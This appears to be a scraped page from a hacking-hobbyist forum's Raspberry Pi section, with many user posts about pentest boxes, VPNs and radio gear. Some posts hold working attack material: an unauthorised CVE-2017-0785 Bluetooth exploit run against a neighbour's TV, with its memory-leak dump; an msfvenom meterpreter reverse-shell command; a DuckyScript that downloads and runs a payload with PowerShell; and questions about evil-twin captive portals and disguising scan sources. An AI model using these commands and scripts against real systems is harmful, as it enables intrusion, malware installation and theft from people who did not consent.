Search the Community

Just wanted to share a project I've been working on. Currently calling it "WarBox" as the initial intent was for wardriving and mobility. The unit at most only required one cable for power or can be used we certain battery packs. Control connection is made wireless offering SSH and VNC. Main reason for the build was to have a very clean device that had full linux capabilities for pentesting but in a compact package. It is a single enclosure containing: Raspberry Pi 3 - running Kali 2017.1 Two alfa network adapters GPS module Custom power distribution board Power supply Filtered cooling fan Input voltage is 8-26 volts allowing the use of many sources. GPS module is configured to work with kismet for logging while on wardrives. Also has external power switch that acts as a "Main" for the whole device. Also added power LED for easy visual reference. I plan to soon make a solar battery pack that will mount to the WarBox. I apologize for the poor quality picture and plan to post some more soon. Please share your thoughts on the WarBox!

Hope someone can help me....... I used CVE-2017-0785 to exploit my neighbours SmartTV...... It gave me this out ---> sudo python CVE-2017-0785.py TARGET=CC:B1:1A:F6:D7:76 [!] Pwntools does not support 32-bit Python. Use a 64-bit release. [+] Exploit: Done 00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ * 00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 01 │····│····│····│····│ 00000030 b5 69 01 00 b4 8f e9 c0 00 00 00 00 b5 54 fe a3 │·i··│····│····│·T··│ 00000040 00 00 00 06 b5 69 39 70 b4 8f e9 e0 b5 60 61 38 │····│·i9p│····│·`a8│ 00000050 b5 60 61 38 b5 69 39 70 b5 69 39 64 b5 69 5a a4 │·`a8│·i9p│·i9d│·iZ·│ 00000060 b4 8f e9 f8 00 00 00 00 b5 69 5a a4 00 00 00 41 │····│····│·iZ·│···A│ 00000070 b4 8f eb 84 b5 54 e6 f9 b5 60 61 38 b5 69 41 78 │····│·T··│·`a8│·iAx│ 00000080 b4 8f ea 08 b5 56 e0 4f b4 8f ea 10 b5 54 57 fd │····│·V·O│····│·TW·│ 00000090 00 00 00 00 b5 69 41 60 b5 56 79 59 b5 69 39 64 │····│·iA`│·VyY│·i9d│ 000000a0 b4 8f ea 30 00 00 00 18 b4 8f ea d0 b5 54 ca c3 │···0│····│····│·T··│ 000000b0 b5 69 41 60 00 00 00 05 b5 60 61 38 b4 8f ea 58 │·iA`│····│·`a8│···X│ 000000c0 00 00 00 18 b4 8f ea d0 b5 69 39 64 b5 54 d2 bf │····│····│·i9d│·T··│ 000000d0 00 00 00 00 b4 30 04 90 00 00 00 00 42 27 e0 00 │····│·0··│····│B'··│ 000000e0 00 00 00 00 b5 69 39 64 00 00 00 08 00 00 00 01 │····│·i9d│····│····│ 000000f0 b4 30 04 90 b4 8f ea d0 00 00 00 41 b5 69 39 64 │·0··│····│···A│·i9d│ 00000100 b4 8f ea a8 b5 69 41 60 00 00 00 03 b5 69 39 64 │····│·iA`│····│·i9d│ 00000110 b5 60 61 38 b4 30 c8 d8 b4 8f ea a0 b5 56 e0 4f │·`a8│·0··│····│·V·O│ 00000120 b4 8f ea a8 b5 56 f6 21 b4 30 c8 d8 41 02 6f 10 │····│·V·!│·0··│A·o·│ 00000130 b4 8f ea b8 b5 50 a1 b7 21 00 00 14 0e 0a 24 00 │····│·P··│!···│··$·│ 00000140 b5 60 61 38 b5 69 ab 60 b4 8f ea d0 b5 56 e0 4f │·`a8│·i·`│····│·V·O│ 00000150 b4 8f ea d8 b5 69 ab 58 b3 6d d4 87 00 00 00 00 │····│·i·X│·m··│····│ 00000160 b4 8f ea f8 00 00 00 02 00 00 00 10 b3 6d f4 b0 │····│····│····│·m··│ 00000170 b5 60 61 38 b5 56 d2 45 b4 8f eb 10 00 00 00 00 │·`a8│·V·E│····│····│ 00000180 b5 69 5a a4 00 00 00 41 00 00 00 13 b5 54 e6 f9 │·iZ·│···A│····│·T··│ 00000190 b4 8f ed 24 b5 69 41 60 b5 60 61 38 b4 8f eb 30 │···$│·iA`│·`a8│···0│ 000001a0 00 00 00 19 b4 8f ed 24 00 00 00 41 b5 54 9f 4b │····│···$│···A│·T·K│ 000001b0 00 00 00 00 b5 69 41 60 b5 60 61 38 00 00 00 64 │····│·iA`│·`a8│···d│ 000001c0 b4 8f eb 48 b5 56 e0 4f b4 8f eb 50 b5 56 ef 31 │···H│·V·O│···P│·V·1│ 000001d0 b5 60 61 38 b5 69 ab 60 b5 60 61 38 b5 69 ab 60 │·`a8│·i·`│·`a8│·i·`│ 000001e0 b4 8f eb 68 b5 56 e0 4f b4 8f eb 70 b5 54 57 fd │···h│·V·O│···p│·TW·│ 000001f0 b5 69 ab 58 b4 8f ed 24 00 00 00 41 b5 69 ab 10 │·i·X│···$│···A│·i··│ 00000200 b4 8f eb 90 00 00 00 0f b4 8f ed 24 b5 56 82 8b │····│····│···$│·V··│ 00000210 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000220 b5 60 61 38 b5 60 61 38 b3 6e 95 b8 00 00 00 41 │·`a8│·`a8│·n··│···A│ 00000230 b4 8f eb c8 00 00 00 41 b3 6e 95 b8 b5 60 61 38 │····│···A│·n··│·`a8│ 00000240 b3 6e b5 f0 b5 56 79 25 b5 56 78 bd b5 69 41 60 │·n··│·Vy%│·Vx·│·iA`│ 00000250 b5 69 39 64 00 00 00 14 b4 8f eb e0 b5 54 cd db │·i9d│····│····│·T··│ 00000260 b5 56 79 59 b5 69 39 64 b4 8f eb f0 b5 54 c9 f5 │·VyY│·i9d│····│·T··│ 00000270 b5 69 41 60 b5 69 41 60 00 00 00 06 b5 60 61 38 │·iA`│·iA`│····│·`a8│ 00000280 b4 8f ec 18 00 00 00 14 b3 6e f6 60 b5 54 d2 13 │····│····│·n·`│·T··│ 00000290 b5 54 da cd b5 69 41 60 00 00 00 00 b5 69 39 64 │·T··│·iA`│····│·i9d│ 000002a0 b4 8f ec 38 00 00 00 00 00 00 00 00 b5 60 00 00 │···8│····│····│·`··│ 000002b0 b5 60 61 38 b3 6f 16 a0 00 00 00 41 00 00 00 0f │·`a8│·o··│···A│····│ 000002c0 b4 8f ec 68 00 00 00 0f b3 6f 16 a8 b5 60 61 38 │···h│····│·o··│·`a8│ 000002d0 b3 6f 36 d0 b5 54 6e 5d 00 00 00 00 ff ff ff ff │·o6·│·Tn]│····│····│ 000002e0 00 00 00 00 b5 68 13 71 00 00 00 0c b5 69 39 70 │····│·h·q│····│·i9p│ 000002f0 00 00 00 0e b5 5d 62 84 b5 5d 62 c0 b5 5d 62 e0 │····│·]b·│·]b·│·]b·│ 00000300 b5 5d 63 10 b5 5d 63 3c b5 5d 63 68 00 00 00 41 │·]c·│·]c<│·]ch│···A│ 00000310 b3 6c 82 1c 00 00 00 01 00 00 00 00 b3 6c 82 36 │·l··│····│····│·l·6│ 00000320 b4 8f ed 24 00 00 00 41 b3 6c 82 36 00 00 00 00 │···$│···A│·l·6│····│ 00000330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 │····│····│····│····│ 00000340 00 00 00 00 b5 60 61 38 b5 60 61 38 b5 69 39 70 │····│·`a8│·`a8│·i9p│ 00000350 b5 69 39 64 b5 69 5a a4 b4 8f ec f0 00 00 00 00 │·i9d│·iZ·│····│····│ 00000360 b5 69 5a a4 b4 31 15 07 b5 69 39 70 b5 54 e6 f9 │·iZ·│·1··│·i9p│·T··│ 00000370 b5 69 39 64 00 00 00 02 b5 69 5a a4 b4 8f ed 20 │·i9d│····│·iZ·│··· │ 00000380 b4 31 15 07 00 00 00 0c b4 31 15 07 b5 54 ea 59 │·1··│····│·1··│·T·Y│ 00000390 00 00 00 00 00 00 00 00 00 00 00 00 41 02 6f 10 │····│····│····│A·o·│ 000003a0 b5 5d 88 94 b5 5d 88 5c b4 8f f8 f0 b5 69 f7 20 │·]··│·]·\│····│·i· │ 000003b0 00 00 02 e9 42 2b d0 10 00 00 01 74 00 00 00 00 │····│B+··│···t│····│ 000003c0 b4 8f ed 58 00 00 00 00 b4 8f ed 50 00 00 00 81 │···X│····│···P│····│ 000003d0 42 2b cc 60 b4 8f ed 60 00 00 00 00 00 00 00 00 │B+·`│···`│····│····│ 000003e0 00 00 00 00 b5 69 f7 20 b5 69 f6 d4 00 00 00 00 │····│·i· │·i··│····│ 000003f0 b4 8f ed 78 b5 69 f6 b0 00 00 00 00 00 00 ff ff │···x│·i··│····│····│ 00000400 b4 8f ed 98 b4 8f ed 90 b4 8f f8 f0 0e 0a 24 00 │····│····│····│··$·│ 00000410 b4 8f ed 98 │····││ 00000414 Who knows what to do now with this Code?

To keep things short I've been experimenting with cracking wpa in aircrack. Everything works fine except a handshake is never captured as I am told when I go to run aircrack against the .cap file. I am using the panda PAU09 which plenty of people say works great, and yes the deauth command does work. I'm testing this in a home lab type set up so I know for sure the device reconnects to the AP, but for some reason I cannot capture the handshake. I am using the latest version of kali linux on the rpi, but have also tried on parrot sec os with the same issue I an following this guide ( https://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-psk-passwords-using-aircrack-ng-0148366/ ) to the point, substituting my ap's mac. When I use airodump APs show up but connected clients do not. Please help

Just Flashed a Backtrack 5 R3 Arm Disk image and the Pi will not boot, any suggestions on how to boot this image on the Raspberry Pi 3?

I recently decided I was sick and tired of using my laptop to wardrive and needed something more portable. I decided to take one of my pi3's load the Kali arm image and went mostly off of this tutorial. The pi has been set-up to start the wifi on boot and not wait for sign-in which, this tutorial does not provide. However the problem is the headless nature of the project. I started writing a small shell script that basically starts gpsd in the background, verifies successful initialization with $?, then puts wlan1 into monitor mode with airmon-ng, and from there, I need to start a headless instance of Kismet. This is where I am having issues. Kismet almost always refuses to run in the background, I run kistmet_server -i wlan1mon -t <logname> -s and it still populates data in the foreground and when I close the terminal so that I can just throw the pi in a bag and go on my merry way, it stops functioning/logging. Any ideas?

So I have been working on this Server/VPN project for about a month now and I'm supper happy i finally have everything together, setup and boxed up. A quick rundown on what is in there and what i have done. The top black box is clearly just my router and the bottom hosing is an electronic project box i picked up for my local electronics store (Jaycar). The actual internals consist of 3 raspberry pi 3's, a TP 5 port switch which i removed the housing from as the board by itself takes up significantly less room, a 70 watt powered USB hub to power the pi's, 3 micro USB power cables, 3 cat 5e Ethernet cables, and a 2TB external hard drive. The standalone raspberry pi with the 2TB external drive is a self contained, fully functional, and port forwarded for external access, OwnCloud server which i have found myself using on a dally basis. The other 2 that are stack, are VPN related. The bottom pi is my own OpenVPN household server which is port forwarded for external access and it is what i actually connect all of my devices to. The top pi is my NordVPN client that i have also set up as a local internet gateway for my local network. So the config currently works and is setup as follows. My OwnCloud server stands allow with internal pi encryption, https, and encrypted storage. The OpenVPN local server runs all of its encrypted traffic through the NordVPN pi gateway, then through to my router, while still encrypted out to the NordVPN servers and then finally decrypted and out to the internet with a change of location and ip address. Device --> OpenVPN pi Server --> NordVPN pi Client --> Router --> NordVPN Server --> Internet The theory behind this is now i can create and revoke as many client keys as I want and keep track of all of my devices with my own OpenVPN server as well as encrypting my traffic while i am way from home without setting up all of my devices with NordVPN (its all most as simple as drag and drop a ovpn file for most devices using OpenVPN plus OpenVPN can be setup in may different ways and has loads more configuration options), but then also tunnel them out through the internet while maintaining the encryption (instead of decrypt all of my traffic before it leaves my router) as well as changing my geo-location, hiding my traffic from my ISP and also avoiding the 8 device limit that NordVPN sets. Thought? Hope i Have sparked some creativity in everyone.

I am having some trouble with the Alfa AWUS036NH. When connected to a raspberry pi 3 with kali 2017.1 it will not capture handshakes as well as not showing associated clients. The adapter can find APs but that is all. airmon-ng is showing the adapter running driver rt2800usb. I have tried "airmon-ng check kill" prior to monitor mode with no luck. Also have tried "apt-get install firmware-misc-nonfree" which is supposed to help with rt2800usb issues on a rt3070 chip. I have tried using the adapter on a full install kali x64 2017.1 machine install and all appears to be working plug and play. I have searched the raspberry pi, kali, and aircrack forums but have yet to find anything with a working solution. (most threads were dead before solution was posted) Any help with this issue is greatly appreciated!

Hi All I own a Raspberry PI B+ running the latest version of Dietpi. I would like to setup my pi as an OpenVPN server so all my internet traffic at home and from my smartphone will go through the pi. I have been unsuccessful with the installation using the instructions from the dietpi website. http://dietpi.com/phpbb/viewtopic.php?f=8&t=5&p=613#p613 I have also tried this blog post with no luck. http://ruudabma.com/archives/6 So I was think of thing an episode of hak5 a go, but which episode would do the trick as OpenVPN has been quiet a popular top on the show. Or if anyone has any other solutions to my problem that would be greatly appreciated. Cheers

So the latest YouTube video (https://www.youtube.com/watch?v=04EmeXSZo_0&t=1156s) on easily setting up OpenVPN on a Raspberry Pi using the StarshipEngineer script is super useful. But I'm wondering if the Raspberry Pi can also be turned into a WiFi Access Point (assuming onboard wifi available, or appropriate wifi dongle connected), thus allowing any devices to connect to the RPi AP and automatically be routed through the VPN for encrypted onward connection to the ISP and public internet. Is this even possible?

Can i use my yardstick one on my raspberry pi 3 model b?

So I really need help, I though I had everything squared up and ready but I tried to connected externally this afternoon and found a large hole in my plan (a little cranky) . I have everything working great but external access to my OpenVPN server. For more information please read the below link https://forums.hak5.org/index.php?/topi ... vpn-build/ Long story short I need to access my server from outside the network. The setup is my open VPN server on a raspberry pi running raspbian which is on local ip 10.1.1.101 and I run all of its traffic through another raspberry pi configured as a gateway with the ip of 10.1.1.102 then out to the Internet. Everything is working great internally I just need to know what I have to do to access it external. The default gateway for the gateway pi is 10.1.1.1

i wanted to know because im not sure if it works on armv8 (armv7 idk). if it doesnt im going to use another distro.

So just a simple question, I have the means to do the below but just need a proof of concept. I want to run an OwnCloud server on a raspberry pie so I can access all of my files on the cloud for anywhere (as you do), but was also wondering if you're able to send file to OwnCloud from powershell. I know you can send files and email with powershell but can an OwnCloud server receive them? If anyone has any idea of the actual command involved to send a file to an OwnCloud server from powershell could you please post that as well? Thanks for all the help.

Hello, I got Hackrf One, and am trying to work with it on my raspberry pi. I am constantly getting the following error: hackrf_info: symbol lookup error: hackrf_info: undefined symbol: hackrf_device_list I tried everything. First installing gnu-radio via apt-get and building hackrf master from source code, it didn't work. Then I removed gnu-radio and installed it by PyBombs which a lot of people recommended, but it didn't work as well. My last try was downloading the source codes of gnu-radio, osmosdr, iqbal by git clone and building them one by one which took days for gnu-radio. But still I am always getting the same error when I try to run hackrf_info. Does anyone know what can I do? Please I'd appreciate any help! I've been trying to solve this for 2 weeks, I looked everywhere on the net and found nothing to solve this. Thanks.

hey guys i want to get your opinion i want a touch screen dash like most of the newer vehicles out there i drive a 2002 chevy tahoe and it has a din and a half stereo i want to find a touch screen that will fit in the dash without modification lol no grinding the screen needs to be hdmi or run off gpio it just has to work with raspberry pi thats the first issue " the screen display and i absolutly want touch screen " no keyboard / mouse lol second issue im trying to figure out is fm reciever for the raspberry pi i'd like for it to use the factory antenna jack standard on all stereos and third issue is if i take up all the space in the dash with the screen i want to access the usb ports i can get a usb extention cable but i donk know where i could mount it lol ....guys just please comment and if u all come accross something that u think will work 4 me please send me the links as always thanks in advance i appreciate each and every one of you thanks for being here : )

For no real reason but to learn something new, I built Raspberry Pi tablet with Kali and a couple of RTL-SDR's for radio monitoring. I'm naming this computer, "Seirēn" because I think it's pretty and she's a killer lol. She's a work in progress being that I need to see how it runs two RTL's, give it touch screen capabilities, give it sound, and paint the thing some dumb color like pink... More to come!

Hello im working on a small project and was wondering how I can replicate the wifi pineapples ability to pretend to be a known network basically I want I raspberry pi to pretend to be the victims home network then open a captive portal. any ideas

hello reader, i am trying to follow the link here below to make a portable tor/vpn router-ish. so far i have been able to get to the 4th and 5ft step. for some reason (pretty sure it has to be the drivers because at 1 point you can download a file for drivers-ish) it wil not send anything receive anything, i am thinking it is because of the driver file. i have tried looking into the files but its not making sense to me since im a noob to it i am using 2 Alfa Network USB card AWUS036H. and i am using a rpi 3 is there anyone who can help me or can tell me what i am doing wrong? http://makezine.com/projects/browse-anonymously-with-a-diy-raspberry-pi-vpntor-router/ im sorry if i am not aloud to post links from competitive sites (because im not sure if this is one)

Hi all, I have a Raspberry Pi 3 with an Alfa AWUS036H with 7dBi directional antenna set up in a vehicle. I'm wondering what the best method of controlling the Pi in a (not very roomy) vehicle would be? I've considered; A Chromebook, chrooted and connected via SSH or Ethernet cable (a little too bulky, as I can't easily put a laptop on my lap in the vehicle) A small dashboard monitor and bluetooth keyboard A Raspberry Pi Touchscreen A keyboard/case combo thing like this Some way of connecting an Android phone to it What would you go for and why?

Hello.... i have a question about the USB Rubber Ducky... Hope you can help me! My attack computer is a Raspberry Pi 2 with Raspbian installed. My victim PC is a Windows 10 Notebook. I want to get a meterpreter reverse tcp-session to my Raspberry Pi from the victim if i plug in my USB Rubber Ducky into the Windows PC. As i proceeded: 1. i created the “payload.exe” on the Raspberry Pi ~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.178.35 LPORT=443 -f exe -o /home/pi/payload.exe 2. i created a listener file and run it on the Raspberry Pi ~$ sudo nano /home/pi/listener.rc To test how things work I have saved the “payload.exe” on the victim machine's hdd and run it as the systemadministrator . This is was happened on the Pi's screen: so far so good..... My idea now was to let the USB Rubber Ducky do two things for me after plug-in 1. download my “payload.exe” from the internet 2. install it on the victim-pc with admin rights so i created a “inject.bin” with the Duck Toolkit Encoder. This is the Code i used (changed the download URL to an existing) DELAY 500 CONTROL ESCAPE DELAY 200 STRING cmd.exe DELAY 100 ENTER DELAY 500 STRING cd %TEMP% DELAY 100 ENTER DELAY 100 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://.....payload.exe,%TEMP%\payload.exe'); Start-Process "%TEMP%\payload.exe" DELAY 100 ENTER DELAY 100 ALT SPACE DELAY 50 DOWN DELAY 50 DOWN DELAY 50 DOWN DELAY 50 DOWN DELAY 50 DOWN DELAY 50 ENTER DELAY 50 GUI d Now, the code runs through without any errors, if i plug in the Rubber Ducky. But the problem is that meterpreter gets no connection with the Ducky! Why my DuckyScript doesnt execute the downloaded file? I dont understand whats my fault! Whats wrong? Please help me! Greetings to Darren and the whole hak5-Team!

Hi all, How would you go about setting up a stand-alone Raspberry Pi, which would; Be powered by solar, battery, or any other method. At least a few days power, if possible. Have some sort of internet connection available, so one can SSH / NetCat to it. (Dongle?) Be as small and discreet as possible, so it doesn't get stolen. *edit* Think weather monitoring station, but too far away to connect to the same WiFi network as your home PC, and not in range of any free WiFi hotspots.

Hello all, so got an idea, looked in the forums didn’t really find anything really related to this, thought ı would share it and ask for help :) where did this come from?: -shipping cost of pineapple to my location is 204USD -rpi has better harware spec (which is good when ur programming skills are a bit rough like mine) -u can add touchscreen to rpi Hardware Setbacks: rpi doesn't have pins to set a mode, unlike pineapple | possible solution, using the gpio on RPI Current stat: -someone shared the mkv4 ui online with in 2 days ı was able to get most of the UI working :) -ordered a couple of usb-wlan card, will test how they will work (rpi doesn like them all) -did try frutyfy, didnt really like it :/ Goal: (hardware) hardware: RPI2 os: Kali ( if kali v2 for gets released by august 7 for pi will continue with that) screens/panels: rgb lcd and 5inc tft support Network: 2 wifi cards, 1 Ethernet Where I need support: the source of mkv5 UI ( the github is empty) some coding in the gui (for the tft screen) possibly help on making the ui for on RPI Goal: (software) UI: pineapple :) multiple boot options: -wireless router (tor/vpn/normal) -plug to see network info (ip/subnet/dns, outgoing ports) needs screen and an online server -vpn gate way (plug the cable in, connect from home) future updates: adding media center functions to disguise the evil inside, so you can plug it to a tv it will work like a media center but will be a pentest box in the back :) open to any ideas/ resources etc

Hi every one, I have a Windows XP system with ZoneAlarm firewall installed. I have 2 raspberry Pi computers with Nmap installed I have been attempting to use one RPI to scan the XP system but I am trying to fool ZoneAlarm into thinking the scan came from another address. So I have XP system on 192.168.0.18. ZoneAlarm installed. RPI 1 on 192,168.0.13 - set as untrusted on ZoneAlarm RPI 2 on 192.168.0.14 - set as trusted on ZoneAlarm I ran a decoy scan from RPI 1 to the XP system. I get the results from the scan but ZoneAlarm knows the scan came from 192.168.0.13 and the IP shows up in the log. I then tried a zombie scan from RPI 1 and an error is returned from Nmap saying 'Idle scan is unable to obtain meaningful results from proxy' I have searched for the error but cannot get any meaningful result. Does the system I am using as the zombie or decoy need certain ports to be opened to allow this type of scan to work? Any help much appreciatted.

Can anyone help me in making IRC website for my collage ? can i use raspberry (pi) and pineapple (mark 5) to do that? plz help me in doing that just give me instruction and i will also do my research to make that better..plz someone help me in this..... love hak5

I have my raspberry pi running Piratebox (piratebox.cc).. i just want to know how to connect raspberry pi ent0 to wifi pineapple ......plz someone help me on this ..